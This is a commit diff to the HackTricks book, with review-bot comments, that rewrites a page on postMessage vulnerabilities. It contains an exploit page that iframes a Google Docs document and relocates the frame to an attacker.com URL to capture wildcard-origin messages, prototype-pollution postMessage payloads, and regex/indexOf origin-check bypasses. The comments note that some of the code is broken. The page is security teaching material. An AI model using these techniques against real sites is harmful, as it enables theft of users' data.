GitBook: [master] 2 pages modified

This commit is contained in:
CPol 2021-10-04 21:42:12 +00:00 committed by gitbook-bot
parent 8625431ec6
commit eb47c749d2
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
2 changed files with 37 additions and 36 deletions

View File

@ -50,7 +50,6 @@ You can find **my reviews of the certifications eMAPT and eWPTXv2** \(and their
Copyright © Carlos Polop 2020. Except where otherwise specified, the text on [HACK TRICKS](https://github.com/carlospolop/hacktricks) by Carlos Polop is licensed under the [**Commons Clause**](https://commonsclause.com/) \(which allow you to use this content freely WITHOUT commercial use\).
**Copyright © Carlos Polop 2021. Except where otherwise specified, the rights of the text on** [**HACKTRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop are reserved.**
**Copyright © Carlos Polop 2020. Except where otherwise specified \(the copied information belongs to the original authors\), the text on** [**HACK TRICKS**](https://github.com/carlospolop/hacktricks) **by Carlos Polop is licensed under the**[ **Attribution-NonCommercial 4.0 International \(CC BY-NC 4.0\)**](https://creativecommons.org/licenses/by-nc/4.0/)**.
If you want to use it with commercial purposes, please contact with me.**
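Review bot: the replacement copyright sentence drops the qualifier "\(the copied information belongs to the original authors\)" that the CC BY-NC version carried, although the book still reproduces third-party material (the second file in this same commit adds a "Copied from https://jlajara.gitlab.io/..." line). Consider keeping that clause in the new "rights ... are reserved" sentence so reserved rights are not asserted over quoted text. Minor: the old and new lines spell the link text "HACK TRICKS" and "HACKTRICKS" respectively; pick one.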

View File

@ -1,40 +1,51 @@
# PostMessage Vulnerabilities
## **PostMessages wildcards**
## Send **PostMessage**
**PostMessage** uses the following function to send a message:
```javascript
```bash
targetWindow.postMessage(message, targetOrigin, [transfer]);
# postMessage to current page
window.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an iframe with id "idframe"
document.getElementById('idframe').contentWindow.postMessage('{"__proto__":{"isAdmin":True}}', '*')
# postMessage to an URL
window.postMessage('{"__proto__":{"isAdmin":True}}', 'https://company.com')
```
Check that **targetOrigin** could be a url like _https://company.com_, so the messages can only be sent to that user \(secure\). Or it cloud be a wildcard "**\***". In case a wildcard is used, messages could be sent to any domain.
Note that **targetOrigin** can be a '\*' or an URL like _https://company.com._
In the **second scenario**, the **message can only be sent to that domain** \(even if the origin of the window object is different\).
If the **wildcard** is used, **messages could be sent to any domain**, and will be sent to the origin of the Window object.
### Attack
### Attacking iframe & wilcard in **targetOrigin**
In [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) you can read how you could **iframe a page** that at some point may **sent** a **postmessage** using a **wildcard as targetOrigin** and **modify it's location so the data will be sent to an arbitrary domain**. In order to be able to perform this attack **X-Frame header must not be present** in the vuln page.
As explained in [**this report**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) if you find a page that can be **iframed** \(no `X-Frame-Header` protection\) and that is **sending sensitive** message via **postMessage** using a **wildcard** \(\*\), you can **modify** the **origin** of the **iframe** and **leak** the **sensitive** message to a domain controlled by you.
Note that if the page can be iframed but the **targetOrigin** is **set to a URL and not to a wildcard**, this **trick won't work**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
<script>
//pseudo code
setTimeout(function(){ exp(); }, 6000);
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://geekycat.in/exploit.html";
}, 100);
}
</script>
<iframe src="https://docs.google.com/document/ID" />
<script>
setTimeout(exp, 6000); //Wait 6s
//Try to change the origin of the iframe each 100ms
function exp(){
setInterval(function(){
window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
}, 100);
}
</script>
</html>
```
## addEventListener exploitation
In order to treat the messages a code similar to the following one will be used:
**`addEventListener`** is the function used by JS to declare the function that is **expecting `postMessages`**.
A code similar to the following one will be used:
```javascript
window.addEventListener("message", (event) => {
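Review bot: the three sample calls send `'{"__proto__":{"isAdmin":True}}'`, but `True` is not valid JSON, so a receiver that does `JSON.parse(event.data)` throws before it ever reaches the merge logic the example is meant to illustrate; it should be lowercase `true`. The same block is now fenced as ```bash although its contents are JavaScript (the fence it replaces was ```javascript), which mis-highlights both the `#` comments and the calls. In the prose, "the message can only be sent to that domain \(even if the origin of the window object is different\)" is ambiguous about which window is meant: state plainly that `targetOrigin` is compared against the current origin of the receiving window and the message is silently dropped on a mismatch, which is exactly why a wildcard lets a relocated iframe receive it. In the new exploit page the `//pseudo code` comment was removed but `window.frames[0].frame[0][2].location` was kept; `frame` is not a window property (`frames` is), so either restore the pseudo-code marker or correct the accessor, and `<iframe ... />` is not a self-closing element in HTML and needs an explicit `</iframe>`. Typos: "wilcard" in the new heading, "it's location", "cloud be", and the header is `X-Frame-Options`, not `X-Frame-Header`.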
@ -45,24 +56,15 @@ window.addEventListener("message", (event) => {
}, false);
```
Note in this case how the first thing that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints and change the victims passwords \(in this example\).
Note in this case how the **first thing** that the code is doing is **checking the origin**. This is terribly **important** mainly if the page is going to do **anything sensitive** with the received information \(like changing a password\). **If it doesn't check the origin, attackers can make victims send arbitrary data to this endpoints** and change the victims passwords \(in this example\).
It's important to check the origin and it's **equally important to check it right:**
### Tips/Bypasses in PostMessage vulnerabilities
### addEventListener check origin bypasses
Copied from [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html)
* If `indexOf()` is used to check the origin of the PostMessage event, remember that it can be bypassed if the origin is contained in the string as seen in [_The Bypass_](https://jlajara.gitlab.io/web/2020/07/17/Dom_XSS_PostMessage_2.html#bypass)
* [@filedescriptor](https://twitter.com/filedescriptor): Using `search()` to validate the origin could be insecure. According to the docs of `String.prototype.search()`, the method takes a regular repression object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp.
```javascript
"https://www.safedomain.com".search(t.origin)
```
In regular expression, a dot \(.\) is treated as a wildcard. In other words, any character of the origin can be replaced with a dot. An attacker can take advantage of it and use a special domain instead of the official one to bypass the validation, such as **www.s.afedomain.com**.
* [@bored-engineer](https://bored.engineer/): If `escapeHtml` function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
* If **`indexOf()`** is used to **check** the **origin** of the PostMessage event, remember that it can be easily bypassed like in the following example: `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")`
* If **`search()`** is used to **validate** the **origin** could be insecure. According to the docs of `String.prototype.search()`, the method **takes a regular repression** object instead of a string. If anything other than regexp is passed, it will get implicitly converted into a regexp. In regular expression, **a dot \(.\) is treated as a wildcard**. An attacker can take advantage of it and **use** a **special domain** instead of the official one to bypass the validation, like in: `"https://www.safedomain.com".search("www.s.fedomain.com")`.
* If **`escapeHtml`** function is used, the function does not create a `new` escaped object, instead it over-writes properties of the existing object. This means that if we are able to create an object with a controlled property that does not respond to `hasOwnProperty` it will not be escaped.
```javascript
// Expected to fail:
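Review bot: the `indexOf()` bullet shows `("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")` without saying which side is `event.origin`, so a reader cannot tell which check shape is weak; name the vulnerable form (the allow-list string is searched for the received origin, so any origin that is a substring of it passes) and the recommended check, a strict equality comparison of `event.origin` against a list of full origins, which also disposes of the `search()` case since no regular expression is involved. The rewrite also drops the credits to @filedescriptor and @bored-engineer that the previous bullets carried while keeping the "Copied from" line; keep the per-item attributions. Typos present in both the old and the new text: "regular repression" should read "regular expression", and "this endpoints" should read "these endpoints".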